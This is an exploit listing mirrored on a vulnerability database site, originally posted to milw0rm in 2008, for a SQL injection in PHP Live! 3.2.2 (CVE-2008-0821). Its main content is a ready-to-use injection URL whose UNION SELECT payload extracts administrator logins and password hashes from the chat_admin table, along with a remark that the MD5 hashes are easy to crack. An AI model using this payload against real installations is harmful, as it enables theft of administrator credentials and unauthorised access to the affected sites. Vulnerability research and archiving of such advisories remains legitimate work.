Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

PHP Live! 3.2.2 - 'questid' SQL Injection (1)

Related Vulnerabilities: CVE-2008-0821  
Publish Date: 14 Feb 2008
Author: Xar
Source / Download Exploit 
                [!]Info[!]

PHP Live! (© OSI Codes Inc.) enables live help and live customer support communication directly from your website. With PHP Live!, you can provide one-on-one chat assistance in real-time, answer visitor questions and add that extra human touch to your website.

[!]SQL Injection[!]

Code:
phplive//admin/traffic/knowledg
e_searchm.php?l=phplive&x=1&action=expand_question&questid=-1+union+all+select+1,2,3,4,5,6,concat(login,char(5,password),8+from+chat_admin--&deptid=2&catid=1&keyword=a

[!]Info[!]
+Hashes are regular md5 - easy to crack


Dork: "Find your own ;)"

Credits -

Found by Xar of h4ck-y0u

Greets to Don & ViSiOn

# milw0rm.com [2008-02-14]

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started